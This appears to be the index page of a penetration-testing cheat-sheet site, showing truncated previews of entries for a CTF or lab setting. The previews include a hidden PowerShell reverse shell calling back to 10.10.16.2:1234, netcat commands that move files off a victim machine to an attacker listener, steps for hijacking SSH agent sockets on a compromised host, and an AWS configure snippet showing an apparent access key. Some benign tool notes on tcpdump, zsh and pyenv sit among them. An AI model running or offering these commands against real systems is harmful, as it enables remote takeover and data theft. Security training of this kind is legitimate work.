Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...

AWS Configuration How to configure aws to get access to its functions: ❯ aws configure AWS Access Key ID [****************6TDC]: AQLA5M37BDN6FJP76TDCAWS Secret Access Key [****************Fo1A]: ...

Abusing dereference Reviewing the code inside we get this: #!/bin/bash file=`date +%N` /usr/bin/rm -rf /opt/backups/* /usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/ sha1sum "/opt/backups/...

Step 1: We first determine the SSH process ID of the user on the compromised host: ps aux |grep sshd Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID: grep SSH_AUTH_SOCK ...